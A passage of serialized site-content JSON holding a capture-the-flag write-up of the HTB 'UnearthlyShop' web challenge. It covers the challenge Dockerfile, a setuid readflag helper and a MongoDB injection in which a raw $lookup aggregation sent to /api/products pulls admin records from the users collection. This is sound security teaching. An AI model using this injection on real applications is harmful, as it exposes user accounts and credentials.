flag.",{"type":33,"tag":75,"props":40175,"children":40177},{"imgSrc":40176},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499788/writeups/nexus-void/flag_collab.webp",[],{"type":33,"tag":5227,"props":40179,"children":40180},{},[40181],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":40183},[40184,40185,40186,40187],{"id":42,"depth":362,"text":45},{"id":35058,"depth":362,"text":35061},{"id":36591,"depth":362,"text":36594},{"id":39848,"depth":362,"text":39851},"content:writeups:nexus-void.md","writeups/nexus-void.md","writeups/nexus-void",{"_path":40192,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":40193,"description":8,"head":40194,"body":40212,"_type":5240,"_id":43346,"_source":5242,"_file":43347,"_stem":43348,"_extension":5245},"/writeups/unearthly-shop","UnearthlyShop",{"title":40193,"description":40195,"keywords":40196,"slug":40197,"image":40198,"date":40199,"meta":40200},"UnearthlyShop challenge, was a hard web challenge from HTB cyber apocalypse. It was about php gadgets, php deserialization and autoload function.","web,php,deserialization,gadgets,autoload","unearthly-shop","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743778740/writeups/cyber_appo_2023.webp","2023-03-23",[40201,40202,40203,40204,40205,40207,40208,40210],{"og:image":40198},{"og:title":40193},{"og:description":40195},{"og:type":21},{"og:url":40206},"https://owalid.com/unearthly-shop",{"description":40195},{"title":40209},"UnearthlyShop writeup",{"keywords":40211},"web,php,deserialization,gadgets,autoload,htb,ctf",{"type":30,"children":40213,"toc":43337},[40214,40219,40223,40228,40233,40253,40258,40408,40413,40548,40552,40557,40562,40580,40585,40590,40596,40601,40606,40617,40622,40627,40748,40753,40766,40770,41189,41194,41199,41316,41321,41325,41331,41336,41480,41485,41490,41718,41723,41728,42044,42052,42057,42062,42268,42280,42286,42299,42311,42317,42330,42335,42340,42344,42352,42357,42362,42367,42960,42965,42970,42975,43112,43117,43174,43179,43190,43195,43206,43211,43216,43227,43236,43244,43249,43254,43260,43265,43270,43275,43285,43297,43308,43313,43324,43329,43333],{"type":33,"tag":34,"props":40215,"children":40217},{"id":40216},"unearthlyshop",[40218],{"type":38,"value":40193},{"type":33,"tag":40,"props":40220,"children":40221},{"id":42},[40222],{"type":38,"value":45},{"type":33,"tag":47,"props":40224,"children":40225},{},[40226],{"type":38,"value":40227},"UnearthlyShop was a web hard challenge from HTB cyber apocalypse 2023.",{"type":33,"tag":47,"props":40229,"children":40230},{},[40231],{"type":38,"value":40232},"This challenge was in white box, meaning we have access to the source code of the website.",{"type":33,"tag":47,"props":40234,"children":40235},{},[40236,40238,40244,40246,40251],{"type":38,"value":40237},"We can see in the DockerFile that the flag is stored in the directory ",{"type":33,"tag":105,"props":40239,"children":40241},{"className":40240},[],[40242],{"type":38,"value":40243},"/root",{"type":38,"value":40245}," and that they give us permission on an executable file called ",{"type":33,"tag":105,"props":40247,"children":40249},{"className":40248},[],[40250],{"type":38,"value":5294},{"type":38,"value":40252},". This gives us a hint on the type of attack we need to perform.",{"type":33,"tag":47,"props":40254,"children":40255},{},[40256],{"type":38,"value":40257},"In other words, we need to have a RCE (Remote Code Execution). Without this, we will not be able to read the flag.",{"type":33,"tag":114,"props":40259,"children":40260},{"lang":9966},[40261],{"type":33,"tag":119,"props":40262,"children":40264},{"code":40263,"language":9966,"meta":8,"className":22917,"style":8},"...\n# Setup user\nRUN useradd www\n\n# Add readflag binary\nCOPY flag.txt /root/flag\nCOPY config/readflag.c /\nRUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n\n# Copy challenge files\nCOPY challenge /www\n\n# Setup permissions\nRUN chown -R www:www /var/lib/nginx\n...\n",[40265],{"type":33,"tag":105,"props":40266,"children":40267},{"__ignoreMap":8},[40268,40276,40284,40296,40303,40311,40323,40335,40347,40354,40362,40374,40381,40389,40401],{"type":33,"tag":128,"props":40269,"children":40270},{"class":130,"line":131},[40271],{"type":33,"tag":128,"props":40272,"children":40273},{"style":323},[40274],{"type":38,"value":40275},"...\n",{"type":33,"tag":128,"props":40277,"children":40278},{"class":130,"line":362},[40279],{"type":33,"tag":128,"props":40280,"children":40281},{"style":5541},[40282],{"type":38,"value":40283},"# Setup user\n",{"type":33,"tag":128,"props":40285,"children":40286},{"class":130,"line":403},[40287,40291],{"type":33,"tag":128,"props":40288,"children":40289},{"style":1576},[40290],{"type":38,"value":22949},{"type":33,"tag":128,"props":40292,"children":40293},{"style":323},[40294],{"type":38,"value":40295}," useradd www\n",{"type":33,"tag":128,"props":40297,"children":40298},{"class":130,"line":739},[40299],{"type":33,"tag":128,"props":40300,"children":40301},{"emptyLinePlaceholder":896},[40302],{"type":38,"value":899},{"type":33,"tag":128,"props":40304,"children":40305},{"class":130,"line":765},[40306],{"type":33,"tag":128,"props":40307,"children":40308},{"style":5541},[40309],{"type":38,"value":40310},"# Add readflag binary\n",{"type":33,"tag":128,"props":40312,"children":40313},{"class":130,"line":804},[40314,40318],{"type":33,"tag":128,"props":40315,"children":40316},{"style":1576},[40317],{"type":38,"value":23093},{"type":33,"tag":128,"props":40319,"children":40320},{"style":323},[40321],{"type":38,"value":40322}," flag.txt /root/flag\n",{"type":33,"tag":128,"props":40324,"children":40325},{"class":130,"line":839},[40326,40330],{"type":33,"tag":128,"props":40327,"children":40328},{"style":1576},[40329],{"type":38,"value":23093},{"type":33,"tag":128,"props":40331,"children":40332},{"style":323},[40333],{"type":38,"value":40334}," config/readflag.c /\n",{"type":33,"tag":128,"props":40336,"children":40337},{"class":130,"line":848},[40338,40342],{"type":33,"tag":128,"props":40339,"children":40340},{"style":1576},[40341],{"type":38,"value":22949},{"type":33,"tag":128,"props":40343,"children":40344},{"style":323},[40345],{"type":38,"value":40346}," gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n",{"type":33,"tag":128,"props":40348,"children":40349},{"class":130,"line":976},[40350],{"type":33,"tag":128,"props":40351,"children":40352},{"emptyLinePlaceholder":896},[40353],{"type":38,"value":899},{"type":33,"tag":128,"props":40355,"children":40356},{"class":130,"line":988},[40357],{"type":33,"tag":128,"props":40358,"children":40359},{"style":5541},[40360],{"type":38,"value":40361},"# Copy challenge files\n",{"type":33,"tag":128,"props":40363,"children":40364},{"class":130,"line":1001},[40365,40369],{"type":33,"tag":128,"props":40366,"children":40367},{"style":1576},[40368],{"type":38,"value":23093},{"type":33,"tag":128,"props":40370,"children":40371},{"style":323},[40372],{"type":38,"value":40373}," challenge /www\n",{"type":33,"tag":128,"props":40375,"children":40376},{"class":130,"line":1014},[40377],{"type":33,"tag":128,"props":40378,"children":40379},{"emptyLinePlaceholder":896},[40380],{"type":38,"value":899},{"type":33,"tag":128,"props":40382,"children":40383},{"class":130,"line":1026},[40384],{"type":33,"tag":128,"props":40385,"children":40386},{"style":5541},[40387],{"type":38,"value":40388},"# Setup permissions\n",{"type":33,"tag":128,"props":40390,"children":40391},{"class":130,"line":1038},[40392,40396],{"type":33,"tag":128,"props":40393,"children":40394},{"style":1576},[40395],{"type":38,"value":22949},{"type":33,"tag":128,"props":40397,"children":40398},{"style":323},[40399],{"type":38,"value":40400}," chown -R www:www /var/lib/nginx\n",{"type":33,"tag":128,"props":40402,"children":40403},{"class":130,"line":1051},[40404],{"type":33,"tag":128,"props":40405,"children":40406},{"style":323},[40407],{"type":38,"value":40275},{"type":33,"tag":47,"props":40409,"children":40410},{},[40411],{"type":38,"value":40412},"And this is the readflag.c file:",{"type":33,"tag":114,"props":40414,"children":40415},{"lang":330},[40416],{"type":33,"tag":119,"props":40417,"children":40419},{"code":40418,"language":330,"meta":8,"className":9071,"style":8},"#include\u003Cunistd.h>\n#include\u003Cstdlib.h>\nint main()\n{\n setuid(0);\n system(\"cat /root/flag\");\n}\n",[40420],{"type":33,"tag":105,"props":40421,"children":40422},{"__ignoreMap":8},[40423,40446,40469,40485,40492,40512,40541],{"type":33,"tag":128,"props":40424,"children":40425},{"class":130,"line":131},[40426,40430,40434,40438,40442],{"type":33,"tag":128,"props":40427,"children":40428},{"style":312},[40429],{"type":38,"value":9092},{"type":33,"tag":128,"props":40431,"children":40432},{"style":1576},[40433],{"type":38,"value":9097},{"type":33,"tag":128,"props":40435,"children":40436},{"style":676},[40437],{"type":38,"value":5977},{"type":33,"tag":128,"props":40439,"children":40440},{"style":140},[40441],{"type":38,"value":9203},{"type":33,"tag":128,"props":40443,"children":40444},{"style":676},[40445],{"type":38,"value":6097},{"type":33,"tag":128,"props":40447,"children":40448},{"class":130,"line":362},[40449,40453,40457,40461,40465],{"type":33,"tag":128,"props":40450,"children":40451},{"style":312},[40452],{"type":38,"value":9092},{"type":33,"tag":128,"props":40454,"children":40455},{"style":1576},[40456],{"type":38,"value":9097},{"type":33,"tag":128,"props":40458,"children":40459},{"style":676},[40460],{"type":38,"value":5977},{"type":33,"tag":128,"props":40462,"children":40463},{"style":140},[40464],{"type":38,"value":9179},{"type":33,"tag":128,"props":40466,"children":40467},{"style":676},[40468],{"type":38,"value":6097},{"type":33,"tag":128,"props":40470,"children":40471},{"class":130,"line":403},[40472,40477,40481],{"type":33,"tag":128,"props":40473,"children":40474},{"style":300},[40475],{"type":38,"value":40476},"int",{"type":33,"tag":128,"props":40478,"children":40479},{"style":135},[40480],{"type":38,"value":15433},{"type":33,"tag":128,"props":40482,"children":40483},{"style":312},[40484],{"type":38,"value":7857},{"type":33,"tag":128,"props":40486,"children":40487},{"class":130,"line":739},[40488],{"type":33,"tag":128,"props":40489,"children":40490},{"style":312},[40491],{"type":38,"value":650},{"type":33,"tag":128,"props":40493,"children":40494},{"class":130,"line":765},[40495,40500,40504,40508],{"type":33,"tag":128,"props":40496,"children":40497},{"style":135},[40498],{"type":38,"value":40499}," setuid",{"type":33,"tag":128,"props":40501,"children":40502},{"style":312},[40503],{"type":38,"value":5566},{"type":33,"tag":128,"props":40505,"children":40506},{"style":523},[40507],{"type":38,"value":10442},{"type":33,"tag":128,"props":40509,"children":40510},{"style":312},[40511],{"type":38,"value":5815},{"type":33,"tag":128,"props":40513,"children":40514},{"class":130,"line":804},[40515,40520,40524,40528,40533,40537],{"type":33,"tag":128,"props":40516,"children":40517},{"style":135},[40518],{"type":38,"value":40519}," system",{"type":33,"tag":128,"props":40521,"children":40522},{"style":312},[40523],{"type":38,"value":5566},{"type":33,"tag":128,"props":40525,"children":40526},{"style":676},[40527],{"type":38,"value":669},{"type":33,"tag":128,"props":40529,"children":40530},{"style":140},[40531],{"type":38,"value":40532},"cat /root/flag",{"type":33,"tag":128,"props":40534,"children":40535},{"style":676},[40536],{"type":38,"value":669},{"type":33,"tag":128,"props":40538,"children":40539},{"style":312},[40540],{"type":38,"value":5815},{"type":33,"tag":128,"props":40542,"children":40543},{"class":130,"line":839},[40544],{"type":33,"tag":128,"props":40545,"children":40546},{"style":312},[40547],{"type":38,"value":854},{"type":33,"tag":40,"props":40549,"children":40550},{"id":22881},[40551],{"type":38,"value":22884},{"type":33,"tag":47,"props":40553,"children":40554},{},[40555],{"type":38,"value":40556},"The application follows the same architecture as an ecommerce website, with a store for customers and a back office for administrators.",{"type":33,"tag":47,"props":40558,"children":40559},{},[40560],{"type":38,"value":40561},"The application has three services: two PHP-FPM services and a mongodb database.",{"type":33,"tag":239,"props":40563,"children":40564},{},[40565,40570,40575],{"type":33,"tag":243,"props":40566,"children":40567},{},[40568],{"type":38,"value":40569},"The first PHP-FPM service is used to serve the website. (store)",{"type":33,"tag":243,"props":40571,"children":40572},{},[40573],{"type":38,"value":40574},"The second PHP-FPM service is used to serve the back office. (admin)",{"type":33,"tag":243,"props":40576,"children":40577},{},[40578],{"type":38,"value":40579},"The mongodb database is used to store information about users, products, orders, etc.",{"type":33,"tag":47,"props":40581,"children":40582},{},[40583],{"type":38,"value":40584},"This is the architecture of the application:",{"type":33,"tag":32400,"props":40586,"children":40589},{"width":40587,"src":40588},1031,"https://user-images.githubusercontent.com/28403617/227585032-3b53b421-bf05-4a75-98ad-1bf1a662e979.png",[],{"type":33,"tag":40,"props":40591,"children":40593},{"id":40592},"first-nosqli",[40594],{"type":38,"value":40595},"First NoSQLI",{"type":33,"tag":47,"props":40597,"children":40598},{},[40599],{"type":38,"value":40600},"For now, we only have access to the frontend part, the backoffice part is protected by a password.",{"type":33,"tag":47,"props":40602,"children":40603},{},[40604],{"type":38,"value":40605},"One request that caught our attention more than others:",{"type":33,"tag":114,"props":40607,"children":40608},{},[40609],{"type":33,"tag":119,"props":40610,"children":40612},{"code":40611},"POST /api/products HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 29\n\n[{\"$match\":{\"instock\":true}}]\n",[40613],{"type":33,"tag":105,"props":40614,"children":40615},{"__ignoreMap":8},[40616],{"type":38,"value":40611},{"type":33,"tag":47,"props":40618,"children":40619},{},[40620],{"type":38,"value":40621},"$match is a MongoDB aggregation pipeline operator that matches all documents that meet the specified conditions.",{"type":33,"tag":47,"props":40623,"children":40624},{},[40625],{"type":38,"value":40626},"If we look at the code, we can see that the parameter is not protected to inject MongoDB code.",{"type":33,"tag":114,"props":40628,"children":40630},{"land":40629},"php",[40631],{"type":33,"tag":119,"props":40632,"children":40635},{"code":40633,"language":40629,"meta":8,"className":40634,"style":8},"public function getProducts($query)\n{\n return $this->database->query('products', $query);\n}\n","language-php shiki shiki-themes vitesse-dark",[40636],{"type":33,"tag":105,"props":40637,"children":40638},{"__ignoreMap":8},[40639,40668,40675,40741],{"type":33,"tag":128,"props":40640,"children":40641},{"class":130,"line":131},[40642,40646,40650,40655,40660,40664],{"type":33,"tag":128,"props":40643,"children":40644},{"style":300},[40645],{"type":38,"value":25953},{"type":33,"tag":128,"props":40647,"children":40648},{"style":300},[40649],{"type":38,"value":15428},{"type":33,"tag":128,"props":40651,"children":40652},{"style":135},[40653],{"type":38,"value":40654}," getProducts",{"type":33,"tag":128,"props":40656,"children":40657},{"style":312},[40658],{"type":38,"value":40659},"($",{"type":33,"tag":128,"props":40661,"children":40662},{"style":306},[40663],{"type":38,"value":5810},{"type":33,"tag":128,"props":40665,"children":40666},{"style":312},[40667],{"type":38,"value":2427},{"type":33,"tag":128,"props":40669,"children":40670},{"class":130,"line":362},[40671],{"type":33,"tag":128,"props":40672,"children":40673},{"style":312},[40674],{"type":38,"value":650},{"type":33,"tag":128,"props":40676,"children":40677},{"class":130,"line":403},[40678,40682,40687,40691,40696,40701,40705,40709,40713,40717,40721,40725,40729,40733,40737],{"type":33,"tag":128,"props":40679,"children":40680},{"style":1576},[40681],{"type":38,"value":6810},{"type":33,"tag":128,"props":40683,"children":40684},{"style":312},[40685],{"type":38,"value":40686}," $",{"type":33,"tag":128,"props":40688,"children":40689},{"style":151},[40690],{"type":38,"value":3721},{"type":33,"tag":128,"props":40692,"children":40693},{"style":300},[40694],{"type":38,"value":40695},"->",{"type":33,"tag":128,"props":40697,"children":40698},{"style":306},[40699],{"type":38,"value":40700},"database",{"type":33,"tag":128,"props":40702,"children":40703},{"style":300},[40704],{"type":38,"value":40695},{"type":33,"tag":128,"props":40706,"children":40707},{"style":135},[40708],{"type":38,"value":5810},{"type":33,"tag":128,"props":40710,"children":40711},{"style":312},[40712],{"type":38,"value":5566},{"type":33,"tag":128,"props":40714,"children":40715},{"style":676},[40716],{"type":38,"value":6040},{"type":33,"tag":128,"props":40718,"children":40719},{"style":140},[40720],{"type":38,"value":36071},{"type":33,"tag":128,"props":40722,"children":40723},{"style":676},[40724],{"type":38,"value":6040},{"type":33,"tag":128,"props":40726,"children":40727},{"style":312},[40728],{"type":38,"value":5584},{"type":33,"tag":128,"props":40730,"children":40731},{"style":312},[40732],{"type":38,"value":40686},{"type":33,"tag":128,"props":40734,"children":40735},{"style":306},[40736],{"type":38,"value":5810},{"type":33,"tag":128,"props":40738,"children":40739},{"style":312},[40740],{"type":38,"value":5815},{"type":33,"tag":128,"props":40742,"children":40743},{"class":130,"line":739},[40744],{"type":33,"tag":128,"props":40745,"children":40746},{"style":312},[40747],{"type":38,"value":854},{"type":33,"tag":47,"props":40749,"children":40750},{},[40751],{"type":38,"value":40752},"It is therefore possible to inject MongoDB code from this request.",{"type":33,"tag":47,"props":40754,"children":40755},{},[40756,40757,40764],{"type":38,"value":461},{"type":33,"tag":53,"props":40758,"children":40761},{"href":40759,"rel":40760},"https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/",[57],[40762],{"type":38,"value":40763},"$lookup",{"type":38,"value":40765},", it is possible to retrieve data from another MongoDB collection.",{"type":33,"tag":32400,"props":40767,"children":40769},{"width":40587,"src":40768},"https://user-images.githubusercontent.com/28403617/227582895-e91a7105-203e-4db9-8de0-fac60f5a1a35.png",[],{"type":33,"tag":114,"props":40771,"children":40772},{"land":633},[40773],{"type":33,"tag":119,"props":40774,"children":40776},{"code":40775,"language":633,"meta":8,"className":637,"style":8},"[\n {\n \"$lookup\": {\n \"from\": \"users\", \u003C- This is the collection we want to retrieve data from\n \"localField\": \"aaaaa\", \u003C- This is the field from the input collection\n \"foreignField\": \"aaaaa\", \u003C- This is the field that the documents in the from collection must match\n \"as\": \"adminData\" \u003C- This is the name of the new field that will contain the data\n }\n }\n]\n",[40777],{"type":33,"tag":105,"props":40778,"children":40779},{"__ignoreMap":8},[40780,40788,40796,40819,40905,40980,41077,41168,41175,41182],{"type":33,"tag":128,"props":40781,"children":40782},{"class":130,"line":131},[40783],{"type":33,"tag":128,"props":40784,"children":40785},{"style":312},[40786],{"type":38,"value":40787},"[\n",{"type":33,"tag":128,"props":40789,"children":40790},{"class":130,"line":362},[40791],{"type":33,"tag":128,"props":40792,"children":40793},{"style":312},[40794],{"type":38,"value":40795}," {\n",{"type":33,"tag":128,"props":40797,"children":40798},{"class":130,"line":403},[40799,40803,40807,40811,40815],{"type":33,"tag":128,"props":40800,"children":40801},{"style":656},[40802],{"type":38,"value":771},{"type":33,"tag":128,"props":40804,"children":40805},{"style":437},[40806],{"type":38,"value":40763},{"type":33,"tag":128,"props":40808,"children":40809},{"style":656},[40810],{"type":38,"value":669},{"type":33,"tag":128,"props":40812,"children":40813},{"style":312},[40814],{"type":38,"value":284},{"type":33,"tag":128,"props":40816,"children":40817},{"style":312},[40818],{"type":38,"value":762},{"type":33,"tag":128,"props":40820,"children":40821},{"class":130,"line":739},[40822,40826,40830,40834,40838,40842,40846,40850,40854,40859,40864,40868,40872,40877,40882,40887,40891,40896,40900],{"type":33,"tag":128,"props":40823,"children":40824},{"style":656},[40825],{"type":38,"value":12707},{"type":33,"tag":128,"props":40827,"children":40828},{"style":437},[40829],{"type":38,"value":34454},{"type":33,"tag":128,"props":40831,"children":40832},{"style":656},[40833],{"type":38,"value":669},{"type":33,"tag":128,"props":40835,"children":40836},{"style":312},[40837],{"type":38,"value":284},{"type":33,"tag":128,"props":40839,"children":40840},{"style":676},[40841],{"type":38,"value":679},{"type":33,"tag":128,"props":40843,"children":40844},{"style":140},[40845],{"type":38,"value":30376},{"type":33,"tag":128,"props":40847,"children":40848},{"style":676},[40849],{"type":38,"value":669},{"type":33,"tag":128,"props":40851,"children":40852},{"style":312},[40853],{"type":38,"value":5584},{"type":33,"tag":128,"props":40855,"children":40856},{"style":20986},[40857],{"type":38,"value":40858}," \u003C-",{"type":33,"tag":128,"props":40860,"children":40861},{"style":20986},[40862],{"type":38,"value":40863}," This",{"type":33,"tag":128,"props":40865,"children":40866},{"style":20986},[40867],{"type":38,"value":5009},{"type":33,"tag":128,"props":40869,"children":40870},{"style":20986},[40871],{"type":38,"value":4793},{"type":33,"tag":128,"props":40873,"children":40874},{"style":20986},[40875],{"type":38,"value":40876}," collection",{"type":33,"tag":128,"props":40878,"children":40879},{"style":20986},[40880],{"type":38,"value":40881}," we",{"type":33,"tag":128,"props":40883,"children":40884},{"style":20986},[40885],{"type":38,"value":40886}," want",{"type":33,"tag":128,"props":40888,"children":40889},{"style":20986},[40890],{"type":38,"value":4982},{"type":33,"tag":128,"props":40892,"children":40893},{"style":20986},[40894],{"type":38,"value":40895}," retrieve",{"type":33,"tag":128,"props":40897,"children":40898},{"style":20986},[40899],{"type":38,"value":13545},{"type":33,"tag":128,"props":40901,"children":40902},{"style":20986},[40903],{"type":38,"value":40904}," from\n",{"type":33,"tag":128,"props":40906,"children":40907},{"class":130,"line":765},[40908,40912,40917,40921,40925,40929,40934,40938,40942,40946,40950,40954,40958,40963,40967,40971,40975],{"type":33,"tag":128,"props":40909,"children":40910},{"style":656},[40911],{"type":38,"value":12707},{"type":33,"tag":128,"props":40913,"children":40914},{"style":437},[40915],{"type":38,"value":40916},"localField",{"type":33,"tag":128,"props":40918,"children":40919},{"style":656},[40920],{"type":38,"value":669},{"type":33,"tag":128,"props":40922,"children":40923},{"style":312},[40924],{"type":38,"value":284},{"type":33,"tag":128,"props":40926,"children":40927},{"style":676},[40928],{"type":38,"value":679},{"type":33,"tag":128,"props":40930,"children":40931},{"style":140},[40932],{"type":38,"value":40933},"aaaaa",{"type":33,"tag":128,"props":40935,"children":40936},{"style":676},[40937],{"type":38,"value":669},{"type":33,"tag":128,"props":40939,"children":40940},{"style":312},[40941],{"type":38,"value":5584},{"type":33,"tag":128,"props":40943,"children":40944},{"style":20986},[40945],{"type":38,"value":40858},{"type":33,"tag":128,"props":40947,"children":40948},{"style":20986},[40949],{"type":38,"value":40863},{"type":33,"tag":128,"props":40951,"children":40952},{"style":20986},[40953],{"type":38,"value":5009},{"type":33,"tag":128,"props":40955,"children":40956},{"style":20986},[40957],{"type":38,"value":4793},{"type":33,"tag":128,"props":40959,"children":40960},{"style":20986},[40961],{"type":38,"value":40962}," field",{"type":33,"tag":128,"props":40964,"children":40965},{"style":20986},[40966],{"type":38,"value":4788},{"type":33,"tag":128,"props":40968,"children":40969},{"style":20986},[40970],{"type":38,"value":4793},{"type":33,"tag":128,"props":40972,"children":40973},{"style":20986},[40974],{"type":38,"value":16183},{"type":33,"tag":128,"props":40976,"children":40977},{"style":20986},[40978],{"type":38,"value":40979}," collection\n",{"type":33,"tag":128,"props":40981,"children":40982},{"class":130,"line":804},[40983,40987,40992,40996,41000,41004,41008,41012,41016,41020,41024,41028,41032,41036,41041,41045,41050,41055,41059,41063,41067,41072],{"type":33,"tag":128,"props":40984,"children":40985},{"style":656},[40986],{"type":38,"value":12707},{"type":33,"tag":128,"props":40988,"children":40989},{"style":437},[40990],{"type":38,"value":40991},"foreignField",{"type":33,"tag":128,"props":40993,"children":40994},{"style":656},[40995],{"type":38,"value":669},{"type":33,"tag":128,"props":40997,"children":40998},{"style":312},[40999],{"type":38,"value":284},{"type":33,"tag":128,"props":41001,"children":41002},{"style":676},[41003],{"type":38,"value":679},{"type":33,"tag":128,"props":41005,"children":41006},{"style":140},[41007],{"type":38,"value":40933},{"type":33,"tag":128,"props":41009,"children":41010},{"style":676},[41011],{"type":38,"value":669},{"type":33,"tag":128,"props":41013,"children":41014},{"style":312},[41015],{"type":38,"value":5584},{"type":33,"tag":128,"props":41017,"children":41018},{"style":20986},[41019],{"type":38,"value":40858},{"type":33,"tag":128,"props":41021,"children":41022},{"style":20986},[41023],{"type":38,"value":40863},{"type":33,"tag":128,"props":41025,"children":41026},{"style":20986},[41027],{"type":38,"value":5009},{"type":33,"tag":128,"props":41029,"children":41030},{"style":20986},[41031],{"type":38,"value":4793},{"type":33,"tag":128,"props":41033,"children":41034},{"style":20986},[41035],{"type":38,"value":40962},{"type":33,"tag":128,"props":41037,"children":41038},{"style":20986},[41039],{"type":38,"value":41040}," that",{"type":33,"tag":128,"props":41042,"children":41043},{"style":20986},[41044],{"type":38,"value":4793},{"type":33,"tag":128,"props":41046,"children":41047},{"style":20986},[41048],{"type":38,"value":41049}," documents",{"type":33,"tag":128,"props":41051,"children":41052},{"style":20986},[41053],{"type":38,"value":41054}," in",{"type":33,"tag":128,"props":41056,"children":41057},{"style":20986},[41058],{"type":38,"value":4793},{"type":33,"tag":128,"props":41060,"children":41061},{"style":20986},[41062],{"type":38,"value":4788},{"type":33,"tag":128,"props":41064,"children":41065},{"style":20986},[41066],{"type":38,"value":40876},{"type":33,"tag":128,"props":41068,"children":41069},{"style":20986},[41070],{"type":38,"value":41071}," must",{"type":33,"tag":128,"props":41073,"children":41074},{"style":20986},[41075],{"type":38,"value":41076}," match\n",{"type":33,"tag":128,"props":41078,"children":41079},{"class":130,"line":839},[41080,41084,41089,41093,41097,41101,41106,41110,41114,41118,41122,41126,41130,41134,41138,41142,41146,41150,41154,41159,41163],{"type":33,"tag":128,"props":41081,"children":41082},{"style":656},[41083],{"type":38,"value":12707},{"type":33,"tag":128,"props":41085,"children":41086},{"style":437},[41087],{"type":38,"value":41088},"as",{"type":33,"tag":128,"props":41090,"children":41091},{"style":656},[41092],{"type":38,"value":669},{"type":33,"tag":128,"props":41094,"children":41095},{"style":312},[41096],{"type":38,"value":284},{"type":33,"tag":128,"props":41098,"children":41099},{"style":676},[41100],{"type":38,"value":679},{"type":33,"tag":128,"props":41102,"children":41103},{"style":140},[41104],{"type":38,"value":41105},"adminData",{"type":33,"tag":128,"props":41107,"children":41108},{"style":676},[41109],{"type":38,"value":669},{"type":33,"tag":128,"props":41111,"children":41112},{"style":20986},[41113],{"type":38,"value":40858},{"type":33,"tag":128,"props":41115,"children":41116},{"style":20986},[41117],{"type":38,"value":40863},{"type":33,"tag":128,"props":41119,"children":41120},{"style":20986},[41121],{"type":38,"value":5009},{"type":33,"tag":128,"props":41123,"children":41124},{"style":20986},[41125],{"type":38,"value":4793},{"type":33,"tag":128,"props":41127,"children":41128},{"style":20986},[41129],{"type":38,"value":14688},{"type":33,"tag":128,"props":41131,"children":41132},{"style":20986},[41133],{"type":38,"value":15983},{"type":33,"tag":128,"props":41135,"children":41136},{"style":20986},[41137],{"type":38,"value":4793},{"type":33,"tag":128,"props":41139,"children":41140},{"style":20986},[41141],{"type":38,"value":13061},{"type":33,"tag":128,"props":41143,"children":41144},{"style":20986},[41145],{"type":38,"value":40962},{"type":33,"tag":128,"props":41147,"children":41148},{"style":20986},[41149],{"type":38,"value":41040},{"type":33,"tag":128,"props":41151,"children":41152},{"style":20986},[41153],{"type":38,"value":3726},{"type":33,"tag":128,"props":41155,"children":41156},{"style":20986},[41157],{"type":38,"value":41158}," contain",{"type":33,"tag":128,"props":41160,"children":41161},{"style":20986},[41162],{"type":38,"value":4793},{"type":33,"tag":128,"props":41164,"children":41165},{"style":20986},[41166],{"type":38,"value":41167}," data\n",{"type":33,"tag":128,"props":41169,"children":41170},{"class":130,"line":848},[41171],{"type":33,"tag":128,"props":41172,"children":41173},{"style":312},[41174],{"type":38,"value":6760},{"type":33,"tag":128,"props":41176,"children":41177},{"class":130,"line":976},[41178],{"type":33,"tag":128,"props":41179,"children":41180},{"style":312},[41181],{"type":38,"value":845},{"type":33,"tag":128,"props":41183,"children":41184},{"class":130,"line":988},[41185],{"type":33,"tag":128,"props":41186,"children":41187},{"style":312},[41188],{"type":38,"value":3262},{"type":33,"tag":47,"props":41190,"children":41191},{},[41192],{"type":38,"value":41193},"If an input document does not contain the localField or the foreignField, the $lookup treats the field as having a value of null for matching purposes.",{"type":33,"tag":47,"props":41195,"children":41196},{},[41197],{"type":38,"value":41198},"This is an sql representation of the request:",{"type":33,"tag":114,"props":41200,"children":41201},{"lang":10492},[41202],{"type":33,"tag":119,"props":41203,"children":41206},{"code":41204,"language":10492,"meta":8,"className":41205,"style":8},"SELECT *, adminData\nFROM products\nWHERE adminData IN (\n SELECT *\n FROM users\n WHERE null = null\n);\n","language-sql shiki shiki-themes vitesse-dark",[41207],{"type":33,"tag":105,"props":41208,"children":41209},{"__ignoreMap":8},[41210,41227,41239,41262,41275,41288,41309],{"type":33,"tag":128,"props":41211,"children":41212},{"class":130,"line":131},[41213,41218,41222],{"type":33,"tag":128,"props":41214,"children":41215},{"style":1576},[41216],{"type":38,"value":41217},"SELECT",{"type":33,"tag":128,"props":41219,"children":41220},{"style":300},[41221],{"type":38,"value":9826},{"type":33,"tag":128,"props":41223,"children":41224},{"style":323},[41225],{"type":38,"value":41226},", adminData\n",{"type":33,"tag":128,"props":41228,"children":41229},{"class":130,"line":362},[41230,41234],{"type":33,"tag":128,"props":41231,"children":41232},{"style":1576},[41233],{"type":38,"value":22929},{"type":33,"tag":128,"props":41235,"children":41236},{"style":323},[41237],{"type":38,"value":41238}," products\n",{"type":33,"tag":128,"props":41240,"children":41241},{"class":130,"line":403},[41242,41247,41252,41257],{"type":33,"tag":128,"props":41243,"children":41244},{"style":1576},[41245],{"type":38,"value":41246},"WHERE",{"type":33,"tag":128,"props":41248,"children":41249},{"style":323},[41250],{"type":38,"value":41251}," adminData ",{"type":33,"tag":128,"props":41253,"children":41254},{"style":1576},[41255],{"type":38,"value":41256},"IN",{"type":33,"tag":128,"props":41258,"children":41259},{"style":323},[41260],{"type":38,"value":41261}," (\n",{"type":33,"tag":128,"props":41263,"children":41264},{"class":130,"line":739},[41265,41270],{"type":33,"tag":128,"props":41266,"children":41267},{"style":1576},[41268],{"type":38,"value":41269}," SELECT",{"type":33,"tag":128,"props":41271,"children":41272},{"style":300},[41273],{"type":38,"value":41274}," *\n",{"type":33,"tag":128,"props":41276,"children":41277},{"class":130,"line":765},[41278,41283],{"type":33,"tag":128,"props":41279,"children":41280},{"style":1576},[41281],{"type":38,"value":41282}," FROM",{"type":33,"tag":128,"props":41284,"children":41285},{"style":323},[41286],{"type":38,"value":41287}," users\n",{"type":33,"tag":128,"props":41289,"children":41290},{"class":130,"line":804},[41291,41296,41300,41304],{"type":33,"tag":128,"props":41292,"children":41293},{"style":1576},[41294],{"type":38,"value":41295}," 